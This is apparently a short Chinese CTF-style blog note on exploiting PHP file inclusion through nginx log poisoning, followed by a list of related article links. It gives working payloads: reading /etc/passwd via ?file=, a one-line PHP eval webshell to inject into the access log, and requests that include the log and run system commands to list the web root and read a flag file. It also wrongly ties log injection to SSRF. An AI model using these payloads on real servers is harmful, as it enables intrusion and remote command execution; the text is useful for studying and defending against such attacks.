文件包含漏洞

和文件上传漏洞相关联的就是文件包含漏洞了,这是对于漏洞的进一步利用。这边是一些相对比较基础和常见的上传路径整理和方法,后面会继续更新。

对于文件包含漏洞,找到上传位置是一个比较重要的操作。

首先判断是否可以进行日志注入,判断的条件是是否可以进行ssrf漏洞。

传参/etc/passwd,如果成功,则代表可以进行日志注入

复制代码
?file=/etc/passwd

这里还要知道的是我们访问的网页文件一般默认存放在**/var/www/html**

默认nginx日志文件在/var/log/nginx/access.log

可以直接命令执行即可也可以用webshell后门工具连接

复制代码
<?php eval($_GET[2]);?>

可以直接命令执行即可也可以用webshell后门工具连接

?file=/var/log/nginx/access.log&2=system('ls /var/www/html');phpinfo();

?file=/var/log/nginx/access.log&2=system('tac /var/www/html/fl0g.php');phpinfo();
相关推荐
米羊12116 小时前
Linux 内核漏洞提权
网络·安全·web安全
运维行者_17 小时前
2026 技术升级,OpManager 新增 AI 网络拓扑与带宽预测功能
运维·网络·数据库·人工智能·安全·web安全·自动化
chipsense19 小时前
充电桩安全新突破:B型漏电检测技术如何守护电动汽车充电安全?
安全·传感器·充电桩·互感器
王九思19 小时前
Java 内存分析工具 MAT
java·开发语言·安全
模型时代20 小时前
StealC恶意软件控制面板安全漏洞暴露威胁行为者操作
安全·web安全·php
2301_810154551 天前
CTF 编码篇 1
安全
one____dream1 天前
【网安】pwn-ret2shellcode
python·安全·网络安全·网络攻击模型
王然-HUDDM1 天前
技术领跑:HUDDM-7D系统L4级功能安全预研验证
人工智能·嵌入式硬件·安全·车载系统·汽车
腾讯安全应急响应中心1 天前
当AI学会背刺:深度剖析Agent Skills的安全陷阱
人工智能·安全
黎阳之光1 天前
打破视域孤岛,智追目标全程 —— 公安视频追踪技术革新来袭
人工智能·算法·安全·视频孪生·黎阳之光